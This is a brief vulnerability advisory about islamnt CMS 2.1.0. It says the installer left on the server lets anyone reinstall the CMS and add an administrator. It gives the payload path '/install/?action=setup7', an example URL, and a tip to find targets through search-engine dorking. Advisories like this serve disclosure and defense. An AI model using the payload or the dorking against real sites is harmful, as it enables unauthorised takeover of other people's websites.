islamnt CMS version 2.1.0 suffers from an add administrator vulnerability.
====================================================================================================================================
| # Title : islamnt CMS v2.1.0 Add ADmin Vulnerability Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://sourceforge.net/projects/islam-cms/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer.
It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.
[+] Use payload : /install/?action=setup7
[+] http://127.0.0.1/Islam/install/?action=setup7
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================